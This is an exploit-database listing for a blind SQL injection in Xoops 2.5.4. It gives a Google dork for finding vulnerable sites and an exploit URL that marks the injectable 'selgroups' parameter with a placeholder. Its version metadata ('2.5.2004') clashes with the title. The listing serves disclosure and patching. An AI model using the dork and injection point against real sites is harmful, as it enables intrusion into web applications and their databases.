header-logo
Suggest Exploit
vendor:
Xoops
by:
blkhtc0rp
8.8
CVSS
HIGH
Blind SQL Injection
89
CWE
Product Name: Xoops
Affected Version From: 2.5.2004
Affected Version To: 2.5.2004
Patch Exists: YES
Related CWE: N/A
CPE: a:xoops:xoops
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Freebsd 8 and Debian Squeeze
2011

Xoops 2.5.4 Blind SQL Injection

Xoops 2.5.4 is vulnerable to Blind SQL Injection. An attacker can exploit this vulnerability to gain access to the administration menu. The vulnerability exists in the 'fct' parameter of the 'admin.php' script. By manipulating the 'selgroups' parameter, an attacker can inject malicious SQL code.

Mitigation:

Upgrade to the latest version of Xoops.
Source

Exploit-DB raw data:

------------------------------------------
# Xoops 2.5.4 Blind SQL Injection
------------------------------------------

# Dork: "Powered by XOOPS 2.5.4"
# Download: http://sourceforge.net/projects/xoops/
# Date: 10/12/2011
# Author: blkhtc0rp
# Mail: blkhtc0rp[at]yahoo[dot]com
# Tested on: Freebsd 8 and Debian Squeeze


Note:

In order to be successful an attacker must have permission to access the administration menu.

Exploit:

http://192.168.1.109/xoops-2.5.4/modules/system/admin.php?fct=users&selgroups=[Blind Sqli]

Navigation

Suggest Exploit

Services By CQR